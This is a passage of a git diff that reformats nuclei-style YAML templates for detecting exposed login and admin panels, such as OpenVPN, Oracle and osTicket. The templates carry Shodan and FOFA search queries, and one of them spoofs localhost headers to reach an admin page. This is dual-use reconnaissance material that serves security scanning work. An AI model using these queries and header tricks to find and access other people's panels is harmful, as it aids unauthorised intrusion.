Node login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Omnia MPX" tags: panel,omnia,omniampx diff --git a/http/exposed-panels/open-game-panel.yaml b/http/exposed-panels/open-game-panel.yaml index 224eab87fe..ec861b68db 100644 --- a/http/exposed-panels/open-game-panel.yaml +++ b/http/exposed-panels/open-game-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/7418 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/open-stack-dashboard-login.yaml b/http/exposed-panels/open-stack-dashboard-login.yaml index 0ef3dfb524..fed4c7d0ab 100644 --- a/http/exposed-panels/open-stack-dashboard-login.yaml +++ b/http/exposed-panels/open-stack-dashboard-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6464 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,openstack,edb metadata: max-request: 2 + tags: panel,openstack,edb http: - method: GET @@ -22,11 +22,13 @@ http: - '{{BaseURL}}/horizon/auth/login/?next=/horizon/' host-redirects: true + matchers-condition: and matchers: - type: word words: - "Login - OpenStack Dashboard" + - type: status status: - 200 diff --git a/http/exposed-panels/open-virtualization-manager-panel.yaml b/http/exposed-panels/open-virtualization-manager-panel.yaml index 48ca33e5d6..9dd14b1fdc 100644 --- a/http/exposed-panels/open-virtualization-manager-panel.yaml +++ b/http/exposed-panels/open-virtualization-manager-panel.yaml @@ -10,7 +10,7 @@ info: - https://www.ovirt.org/dropped/admin-guide/virt/console-client-resources.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-668 metadata: max-request: 2 diff --git a/http/exposed-panels/openam-panel.yaml b/http/exposed-panels/openam-panel.yaml index e975b6ef16..fb217876d5 100644 --- a/http/exposed-panels/openam-panel.yaml +++ b/http/exposed-panels/openam-panel.yaml @@ -7,7 +7,7 @@ info: description: OpenAM login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 20 @@ -41,6 +41,7 @@ http: host-redirects: true stop-at-first-match: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/openbmcs-detect.yaml b/http/exposed-panels/openbmcs-detect.yaml index 26c0311184..e7c0d58bee 100644 --- a/http/exposed-panels/openbmcs-detect.yaml +++ b/http/exposed-panels/openbmcs-detect.yaml @@ -7,11 +7,11 @@ info: description: OpenBCMS login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: openbmcs,detect metadata: max-request: 1 + tags: openbmcs,detect http: - method: GET @@ -20,6 +20,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/openbullet2-panel.yaml b/http/exposed-panels/openbullet2-panel.yaml index 478a523fc4..c6872cf4a3 100644 --- a/http/exposed-panels/openbullet2-panel.yaml +++ b/http/exposed-panels/openbullet2-panel.yaml @@ -8,10 +8,10 @@ info: Openbullet was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 metadata: - max-request: 1 verified: "true" + max-request: 1 shodan-query: http.favicon.hash:-1264095219 tags: openbullet,panel,login @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/opencart-panel.yaml b/http/exposed-panels/opencart-panel.yaml index 55651d805f..528f38f8ef 100644 --- a/http/exposed-panels/opencart-panel.yaml +++ b/http/exposed-panels/opencart-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.opencart.com classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"OpenCart" tags: panel,opencart diff --git a/http/exposed-panels/opencast-detect.yaml b/http/exposed-panels/opencast-detect.yaml index 1f25f9c6c1..0c84ff591b 100644 --- a/http/exposed-panels/opencast-detect.yaml +++ b/http/exposed-panels/opencast-detect.yaml @@ -7,9 +7,9 @@ info: description: An Opencast Admin panel was discovered. Opencast is a free and open source solution for automated video capture and distribution at scale. reference: - https://github.com/opencast/opencast - tags: panel,opencast metadata: max-request: 1 + tags: panel,opencast http: - method: GET diff --git a/http/exposed-panels/opencats-panel.yaml b/http/exposed-panels/opencats-panel.yaml index aa1166853b..272fb9a797 100644 --- a/http/exposed-panels/opencats-panel.yaml +++ b/http/exposed-panels/opencats-panel.yaml @@ -7,11 +7,11 @@ info: description: OpenCATS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"opencats" tags: panel,opencats @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/opencats/" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/opencpu-panel.yaml b/http/exposed-panels/opencpu-panel.yaml index 02f973db3b..e0ba8efba7 100644 --- a/http/exposed-panels/opencpu-panel.yaml +++ b/http/exposed-panels/opencpu-panel.yaml @@ -9,11 +9,11 @@ info: - https://github.com/opencpu/opencpu/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: opencpu,oss metadata: max-request: 1 + tags: opencpu,oss http: - method: GET diff --git a/http/exposed-panels/openemr-detect.yaml b/http/exposed-panels/openemr-detect.yaml index 9c5ac1f7b1..7180ba90e3 100644 --- a/http/exposed-panels/openemr-detect.yaml +++ b/http/exposed-panels/openemr-detect.yaml @@ -7,12 +7,12 @@ info: description: OpenEMR Product Registration panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 - fofa-query: app="OpenEMR" shodan-query: http.html:"OpenEMR" + fofa-query: app="OpenEMR" tags: panel,openemr http: diff --git a/http/exposed-panels/openerp-database.yaml b/http/exposed-panels/openerp-database.yaml index 19549ec76a..0350a9d716 100644 --- a/http/exposed-panels/openerp-database.yaml +++ b/http/exposed-panels/openerp-database.yaml @@ -7,11 +7,11 @@ info: description: Odoo OpenERP database selector panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: openerp,panel metadata: max-request: 1 + tags: openerp,panel http: - method: GET diff --git a/http/exposed-panels/openfire-admin-panel.yaml b/http/exposed-panels/openfire-admin-panel.yaml index a914ef5a33..d1552fbdbd 100644 --- a/http/exposed-panels/openfire-admin-panel.yaml +++ b/http/exposed-panels/openfire-admin-panel.yaml @@ -7,11 +7,11 @@ info: description: Openfire Admin Console login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"Openfire Admin Console" tags: panel,openfire,admin,console @@ -22,6 +22,7 @@ http: - '{{BaseURL}}/login.jsp' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/opengear-panel.yaml b/http/exposed-panels/opengear-panel.yaml index 2881f230ae..e4a675b50c 100644 --- a/http/exposed-panels/opengear-panel.yaml +++ b/http/exposed-panels/opengear-panel.yaml @@ -8,11 +8,11 @@ info: reference: https://opengear.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="opengear-Management-Console" google-query: intitle:"Opengear Management Console" tags: panel,opengear diff --git a/http/exposed-panels/opennebula-panel.yaml b/http/exposed-panels/opennebula-panel.yaml index d59c9f56c8..ee097afb59 100644 --- a/http/exposed-panels/opennebula-panel.yaml +++ b/http/exposed-panels/opennebula-panel.yaml @@ -11,11 +11,11 @@ info: - https://github.com/OpenNebula classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"opennebula" tags: panel,opennebula,cloud diff --git a/http/exposed-panels/opennms-web-console.yaml b/http/exposed-panels/opennms-web-console.yaml index e2de2415d5..01318606f1 100644 --- a/http/exposed-panels/opennms-web-console.yaml +++ b/http/exposed-panels/opennms-web-console.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/5468 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,login,edb metadata: max-request: 1 + tags: panel,login,edb http: - method: GET diff --git a/http/exposed-panels/opensis-panel.yaml b/http/exposed-panels/opensis-panel.yaml index 4770cdba2a..277162e902 100644 --- a/http/exposed-panels/opensis-panel.yaml +++ b/http/exposed-panels/opensis-panel.yaml @@ -7,7 +7,7 @@ info: description: OpenSIS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 @@ -21,6 +21,7 @@ http: - "{{BaseURL}}/opensis/index.php" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/openvpn-admin.yaml b/http/exposed-panels/openvpn-admin.yaml index 572eafcabc..5c29a61763 100644 --- a/http/exposed-panels/openvpn-admin.yaml +++ b/http/exposed-panels/openvpn-admin.yaml @@ -7,11 +7,11 @@ info: description: OpenVPN Admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.title:"OpenVPN-Admin" tags: panel,openvpn,admin,config @@ -23,6 +23,7 @@ http: - '{{BaseURL}}/index.php' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/openvpn-connect.yaml b/http/exposed-panels/openvpn-connect.yaml index 6e622db417..252b0e736a 100644 --- a/http/exposed-panels/openvpn-connect.yaml +++ b/http/exposed-panels/openvpn-connect.yaml @@ -7,11 +7,11 @@ info: description: OpenVPN Connect panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"openvpn connect" tags: panel,openvpn,connect,vpn diff --git a/http/exposed-panels/openvpn-monitor.yaml b/http/exposed-panels/openvpn-monitor.yaml index e294e71e43..e2d309ebe2 100644 --- a/http/exposed-panels/openvpn-monitor.yaml +++ b/http/exposed-panels/openvpn-monitor.yaml @@ -9,11 +9,11 @@ info: - https://openvpn-monitor.openbytes.ie/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: openvpn,disclosure,panel metadata: max-request: 2 + tags: openvpn,disclosure,panel http: - method: GET diff --git a/http/exposed-panels/openvpn-router-management.yaml b/http/exposed-panels/openvpn-router-management.yaml index d6e173a38f..33e0ba8576 100644 --- a/http/exposed-panels/openvpn-router-management.yaml +++ b/http/exposed-panels/openvpn-router-management.yaml @@ -7,11 +7,11 @@ info: description: OpenVPN Server Router Management Panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Router Management - Server OpenVPN" tags: panel,openvpn,router diff --git a/http/exposed-panels/openvz-web-login.yaml b/http/exposed-panels/openvz-web-login.yaml index 02e6fb2f08..fb151326aa 100644 --- a/http/exposed-panels/openvz-web-login.yaml +++ b/http/exposed-panels/openvz-web-login.yaml @@ -10,11 +10,11 @@ info: - https://github.com/sibprogrammer/owp classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1898583197 tags: panel,openvz diff --git a/http/exposed-panels/openwrt-login.yaml b/http/exposed-panels/openwrt-login.yaml index d5f773d5b5..5df2974207 100644 --- a/http/exposed-panels/openwrt-login.yaml +++ b/http/exposed-panels/openwrt-login.yaml @@ -34,4 +34,4 @@ http: part: body group: 1 regex: - - '(?i)OpenWrt ([A-Z0-9.]+)' \ No newline at end of file + - '(?i)OpenWrt ([A-Z0-9.]+)' diff --git a/http/exposed-panels/openx-panel.yaml b/http/exposed-panels/openx-panel.yaml index f0a79db415..9e5d72d4f8 100644 --- a/http/exposed-panels/openx-panel.yaml +++ b/http/exposed-panels/openx-panel.yaml @@ -5,12 +5,12 @@ info: author: pikpikcu severity: info description: OpenX login panel was detected. Note that OpenX is now Revive Adserver. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.revive-adserver.com/download/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 2 shodan-query: http.title:"OpenX" @@ -23,6 +23,7 @@ http: - "{{BaseURL}}/admin/index.php" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/exposed-panels/oracle-business-control.yaml b/http/exposed-panels/oracle-business-control.yaml index fc964a5647..ee081e653f 100644 --- a/http/exposed-panels/oracle-business-control.yaml +++ b/http/exposed-panels/oracle-business-control.yaml @@ -7,7 +7,7 @@ info: description: Oracle Commerce Business Control Center login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/oracle-business-intelligence.yaml b/http/exposed-panels/oracle-business-intelligence.yaml index 5b160dcc57..c2ff4e1d75 100644 --- a/http/exposed-panels/oracle-business-intelligence.yaml +++ b/http/exposed-panels/oracle-business-intelligence.yaml @@ -7,11 +7,11 @@ info: description: Oracle Business Intelligence login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Oracle Business Intelligence Sign In" tags: panel,oracle diff --git a/http/exposed-panels/oracle-containers-panel.yaml b/http/exposed-panels/oracle-containers-panel.yaml index c623d92709..2148ca1cee 100644 --- a/http/exposed-panels/oracle-containers-panel.yaml +++ b/http/exposed-panels/oracle-containers-panel.yaml @@ -7,11 +7,11 @@ info: description: Oracle Containers for J2EE 10g panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,oracle,containers metadata: max-request: 1 + tags: panel,oracle,containers http: - method: GET diff --git a/http/exposed-panels/oracle-enterprise-manager-login.yaml b/http/exposed-panels/oracle-enterprise-manager-login.yaml index 568605acc1..78a7d345b9 100644 --- a/http/exposed-panels/oracle-enterprise-manager-login.yaml +++ b/http/exposed-panels/oracle-enterprise-manager-login.yaml @@ -7,11 +7,11 @@ info: description: Oracle Enterprise Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,oracle,manager,login metadata: max-request: 1 + tags: panel,oracle,manager,login http: - method: GET diff --git a/http/exposed-panels/oracle-integrated-manager.yaml b/http/exposed-panels/oracle-integrated-manager.yaml index 4382a27757..67cbcbe60c 100644 --- a/http/exposed-panels/oracle-integrated-manager.yaml +++ b/http/exposed-panels/oracle-integrated-manager.yaml @@ -7,7 +7,7 @@ info: description: Oracle Integrated Lights Out Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/oracle-opera-login.yaml b/http/exposed-panels/oracle-opera-login.yaml index b9dd4daf38..0275d980c8 100644 --- a/http/exposed-panels/oracle-opera-login.yaml +++ b/http/exposed-panels/oracle-opera-login.yaml @@ -7,9 +7,9 @@ info: classification: cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"Oracle Opera" && html:"/OperaLogin/Welcome.do" - verified: true tags: panel,opera,oracle,detect http: @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/oracle-people-enterprise.yaml b/http/exposed-panels/oracle-people-enterprise.yaml index 64145be382..4fb6a0653e 100644 --- a/http/exposed-panels/oracle-people-enterprise.yaml +++ b/http/exposed-panels/oracle-people-enterprise.yaml @@ -7,7 +7,7 @@ info: description: Oracle PeopleSoft Enterprise login panel detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/oracle-people-sign-in.yaml b/http/exposed-panels/oracle-people-sign-in.yaml index 45063e227b..a6a9d8a4e4 100644 --- a/http/exposed-panels/oracle-people-sign-in.yaml +++ b/http/exposed-panels/oracle-people-sign-in.yaml @@ -7,7 +7,7 @@ info: description: Oracle PeopleSoft login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/orchid-vms-panel.yaml b/http/exposed-panels/orchid-vms-panel.yaml index 0241561bce..595615704e 100644 --- a/http/exposed-panels/orchid-vms-panel.yaml +++ b/http/exposed-panels/orchid-vms-panel.yaml @@ -7,7 +7,7 @@ info: description: Orchid Core VMS panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/osticket-panel.yaml b/http/exposed-panels/osticket-panel.yaml index c05d9201f5..5158b738d0 100644 --- a/http/exposed-panels/osticket-panel.yaml +++ b/http/exposed-panels/osticket-panel.yaml @@ -7,11 +7,11 @@ info: description: osTicket login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"powered by osTicket" tags: panel,osticket @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/osticket/osticket-install.yaml b/http/exposed-panels/osticket/osticket-install.yaml index cf9bc9e8ef..38882365e8 100644 --- a/http/exposed-panels/osticket/osticket-install.yaml +++ b/http/exposed-panels/osticket/osticket-install.yaml @@ -10,8 +10,8 @@ info: cvss-score: 9.4 cwe-id: CWE-284 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"osTicket Installer" tags: panel,osticket,install @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/setup/install.php" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/otobo-panel.yaml b/http/exposed-panels/otobo-panel.yaml index 1cee3dedf1..abcb98051c 100644 --- a/http/exposed-panels/otobo-panel.yaml +++ b/http/exposed-panels/otobo-panel.yaml @@ -9,7 +9,7 @@ info: - https://github.com/rotheross/otobo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/ourmgmt3-panel.yaml b/http/exposed-panels/ourmgmt3-panel.yaml index 4dfcc096b9..af30e3b260 100644 --- a/http/exposed-panels/ourmgmt3-panel.yaml +++ b/http/exposed-panels/ourmgmt3-panel.yaml @@ -7,11 +7,11 @@ info: description: OurMGMT3 admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"OurMGMT3" tags: panel,ourmgmt3 @@ -22,6 +22,7 @@ http: - '{{BaseURL}}/admin/login' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/pacs-connexion-utilisateur.yaml b/http/exposed-panels/pacs-connexion-utilisateur.yaml index fbc2d5de3c..01ccd0cd95 100644 --- a/http/exposed-panels/pacs-connexion-utilisateur.yaml +++ b/http/exposed-panels/pacs-connexion-utilisateur.yaml @@ -7,7 +7,7 @@ info: description: GXD5 Pacs Connexion panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/pagespeed-global-admin.yaml b/http/exposed-panels/pagespeed-global-admin.yaml index dc9462fe3a..566228b1c1 100644 --- a/http/exposed-panels/pagespeed-global-admin.yaml +++ b/http/exposed-panels/pagespeed-global-admin.yaml @@ -5,18 +5,19 @@ info: author: geeknik severity: info description: Pagespeed Global Admin panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.modpagespeed.com/ - tags: pagespeed,panel + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 + tags: pagespeed,panel http: - method: GET + headers: X-Client-IP: "127.0.0.1" X-Remote-IP: "127.0.0.1" @@ -25,7 +26,6 @@ http: X-Originating-IP: "127.0.0.1" X-Host: "127.0.0.1" X-Forwarded-Host: "127.0.0.1" - path: - "{{BaseURL}}/pagespeed-global-admin/" diff --git a/http/exposed-panels/panabit-panel.yaml b/http/exposed-panels/panabit-panel.yaml index 5eaccd982e..50cc56def4 100644 --- a/http/exposed-panels/panabit-panel.yaml +++ b/http/exposed-panels/panabit-panel.yaml @@ -5,12 +5,12 @@ info: author: ffffffff0x severity: info description: Panabit login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.panabit.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 fofa-query: app="Panabit-智能网关" @@ -23,6 +23,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/pandora-fms-console.yaml b/http/exposed-panels/pandora-fms-console.yaml index ee13a93b53..6cf83daa23 100644 --- a/http/exposed-panels/pandora-fms-console.yaml +++ b/http/exposed-panels/pandora-fms-console.yaml @@ -9,22 +9,24 @@ info: - https://www.exploit-db.com/ghdb/6827 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,edb metadata: max-request: 1 + tags: panel,edb http: - method: GET path: - "{{BaseURL}}/pandora_console/mobile/" + matchers-condition: and matchers: - type: word words: - 'Pandora FMS mobile' part: body + - type: status status: - 200 diff --git a/http/exposed-panels/papercut-ng-panel.yaml b/http/exposed-panels/papercut-ng-panel.yaml index bcfaed6100..2654ece5bb 100644 --- a/http/exposed-panels/papercut-ng-panel.yaml +++ b/http/exposed-panels/papercut-ng-panel.yaml @@ -7,8 +7,8 @@ info: description: | PaperCut is a print management system. Log in to manage your print quotas, see your print history and configure your system. metadata: - max-request: 1 verified: true + max-request: 1 google-query: html:'content="PaperCut' tags: panel,papercut,detect @@ -19,6 +19,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/parallels-html-client.yaml b/http/exposed-panels/parallels-html-client.yaml index 01000e814c..399ed20ddb 100644 --- a/http/exposed-panels/parallels-html-client.yaml +++ b/http/exposed-panels/parallels-html-client.yaml @@ -7,16 +7,17 @@ info: description: Parallels HTML5 Client login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel metadata: max-request: 1 + tags: panel http: - method: GET path: - "{{BaseURL}}/RASHTML5Gateway/" + matchers: - type: word words: diff --git a/http/exposed-panels/parallels/parallels-hsphere-detect.yaml b/http/exposed-panels/parallels/parallels-hsphere-detect.yaml index 556a0d5a4c..31b2a85360 100644 --- a/http/exposed-panels/parallels/parallels-hsphere-detect.yaml +++ b/http/exposed-panels/parallels/parallels-hsphere-detect.yaml @@ -7,11 +7,11 @@ info: description: Parallels H-Sphere login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Parallels H-Sphere" tags: panel,parallels,hsphere @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word words: - "Parallels H-Sphere" diff --git a/http/exposed-panels/parse-dashboard.yaml b/http/exposed-panels/parse-dashboard.yaml index 45e8fe5b56..e6f64d7723 100644 --- a/http/exposed-panels/parse-dashboard.yaml +++ b/http/exposed-panels/parse-dashboard.yaml @@ -7,11 +7,11 @@ info: description: Parse Dashboard login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Parse Dashboard" tags: panel,parse,exposure diff --git a/http/exposed-panels/payroll-management-system-panel.yaml b/http/exposed-panels/payroll-management-system-panel.yaml index 977ed05a4b..9304533a46 100644 --- a/http/exposed-panels/payroll-management-system-panel.yaml +++ b/http/exposed-panels/payroll-management-system-panel.yaml @@ -7,11 +7,11 @@ info: description: Payroll Management System Web login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Admin | Employee's Payroll Management System" tags: panel,payroll @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/pdi-device-page.yaml b/http/exposed-panels/pdi-device-page.yaml index 8da85b02a7..fdd7cfcb27 100644 --- a/http/exposed-panels/pdi-device-page.yaml +++ b/http/exposed-panels/pdi-device-page.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo?fbid=629130339257489&set=a.467014098802448 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"PDI Intellifuel" tags: exposure,pdi,intellifuel,panel @@ -26,4 +26,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/pega-web-panel.yaml b/http/exposed-panels/pega-web-panel.yaml index 561aadc219..b7b16c923e 100644 --- 